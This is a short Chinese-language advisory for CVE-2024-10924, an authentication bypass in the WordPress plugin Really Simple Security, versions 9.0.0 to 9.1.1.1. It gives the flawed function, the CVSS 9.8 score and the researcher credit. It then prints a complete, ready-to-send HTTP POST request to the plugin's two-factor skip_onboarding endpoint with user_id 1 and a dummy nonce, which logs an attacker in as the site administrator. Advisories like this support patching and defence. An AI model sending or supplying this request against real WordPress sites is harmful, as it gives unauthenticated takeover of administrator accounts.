Really Simple Security(免费版、专业版和专业多站点版)9.0.0 – 9.1.1.1 – 身份验证绕过
WordPress的Really Simple Security(免费版、专业版和专业多站点版)插件在9.0.0至9.1.1.1版本中存在身份验证绕过漏洞。这是因为双因素REST API操作中的'check_login_and_get_user'函数对用户检查错误处理不当。当“双因素认证”设置启用时(默认禁用),未经身份验证的攻击者可以利用此漏洞以站点上任何现有用户(如管理员)的身份登录。
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE CVE-2024-10924
CVSS 9.8 (Critical)
公开发布日期 2024年11月14日
最后更新日期 2024年11月14日
研究人员 István Márton - Wordfence
POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;
Connection: keep-alive
Content-Length: 90
{
"user_id":1,
"login_nonce": "231231231",
"redirect_to": "/wp-admin/"
}